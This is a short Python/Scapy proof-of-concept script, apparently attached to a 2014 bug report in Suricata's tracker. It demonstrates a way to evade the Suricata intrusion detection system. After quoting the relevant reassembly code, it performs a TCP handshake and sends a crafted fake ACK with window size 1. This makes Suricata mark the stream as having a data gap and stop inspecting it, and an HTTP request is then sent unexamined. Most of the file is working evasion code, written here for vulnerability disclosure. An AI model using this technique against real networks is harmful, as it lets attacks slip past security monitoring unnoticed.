Project

General

Profile

Bug #1238 » deseq_ACK.py

Clean one - JmpCallPoo ., 07/16/2014 09:30 AM

 
#!/usr/bin/python
#16-07-2014
#@JmpCallPoo

from scapy.all import *

#Possible evasion :
#
#stream-tcp-reassemble.c@2911 (Suricata 2.0.2)
#
#/* Check if we have a gap at the start of the list. If last_ack is
#* bigger than the list start and the list start is bigger than
#* next_seq, we know we are missing data that has been ack'd. That
#* won't get retransmitted, so it's a data gap.
#*/
#if (SEQ_GT(seg->seq, next_seq) && SEQ_LT(seg->seq, stream->last_ack)) {
# ...
# stream->flags |= STREAMTCP_STREAM_FLAG_GAP; //Never process this stream again...
# ...
#}

dst_ip = '1.2.3.4'

syn = IP(dst=dst_ip) / TCP(dport=80, seq=123456, flags='S')
syn_ack = sr1(syn, retry=0, timeout=1)

ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4096)
sr1(ack, retry=0, timeout=1)

#This is the evil packet, this packet flags the TCP stream as STREAMTCP_STREAM_FLAG_GAP (Data Gap) in suricata, but don't impact normal TCP stack
#Set window size to 1, and ACK a non existant packet.
#Working at least on Linux 3.2 and Windows XP
fake_ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+3, flags='A', window=1)
sr1(fake_ack, retry=0, timeout=1)

getStr = 'GET /\r\nHost: '+dst_ip+'\r\n\r\n';
request = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4069) / getStr
reply = sr1(request, retry=0, timeout=2)

#Will not work for you, set the corret seq incrementation, but this packet isn't important !
fin = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack+29, ack=syn_ack[TCP].seq+329, flags='FA', window=4096)
sr1(fin, retry=0, timeout=1)
(2-2/2)